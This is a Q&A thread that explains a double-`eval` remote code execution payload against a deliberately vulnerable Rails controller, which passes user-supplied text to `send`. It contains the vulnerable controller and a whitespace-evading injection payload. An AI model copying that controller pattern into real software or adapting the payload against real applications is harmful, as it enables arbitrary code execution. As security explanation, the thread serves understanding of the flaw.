# Why is the author calling eval twice in this blog post?

Tags: ruby-on-rails, ruby, security

I've been reading the [following blog post](https://briandamaged.org/blog/rails-application-hijacking-part-2/) , and it's unclear to me why is the author calling `eval` twice. Wouldn't calling `eval` just once suffice?

His controller code is this:

```
class GameController < ApplicationController
   def index
   end

   def handle_command
     command = params[:command].split

     c = CommandHandler.new

     begin
       @result = c.send(*command)
     rescue Exception =>; e
      @result = "Stop being an idiot, and do something useful!"
    end

  end
end
```

And example code execution exploits were like this:

```
eval eval('puts^"Hello^world!"'.gsub('^',('^'.ord-62).chr))
```

The thing I don't understand is why there is a need for 2 evals, running this in irb, already prints the string by the first eval, and the second eval tries to evaluate nil.

Comment: First eval returns the string with the code to be evaluated.

Comment: @BroiSatse, running the code in irb, already executes it, and the 2nd eval tries to evaluate nil ( the return of puts )

Comment: That's the point - you want to execute the code so you expect `nil` as result. Otherwise you just got command string. Not that it will also print the string.

Answer (score 1, accepted):

The application is using `send` to evaluate the function with its arguments. Since `eval` only expects a single argument, there cannot be any spaces in the second argument. In short, the expression with double evals is executed as:

```
c.send("eval", "eval('puts^"Hello^world!\"'.gsub('^',('^'.ord-62).chr)"
```

That is equivalent to:

```
c.eval "eval('puts^"Hello^world!\"'.gsub('^',('^'.ord-62).chr)"
```

Which in turn will do the same thing as:

```
eval('puts^"Hello^world!\"'.gsub('^',('^'.ord-62).chr)
```

which is:

```
eval('puts "Hello world!"')   #=> Code is actually evaluating
```

With a single `eval` you would get:

```
#input
eval 'puts^"Hello^world!"'.gsub('^',('^'.ord-62).chr)

c.send("eval" "'puts^\"Hello^world!\"'.gsub('^',('^'.ord-62).chr)"
c.eval "'puts^\"Hello^world!\"'.gsub('^',('^'.ord-62).chr)"

#=> "puts \"Hello world!\""
#=> results in a string containing the code. Code is not executed.
```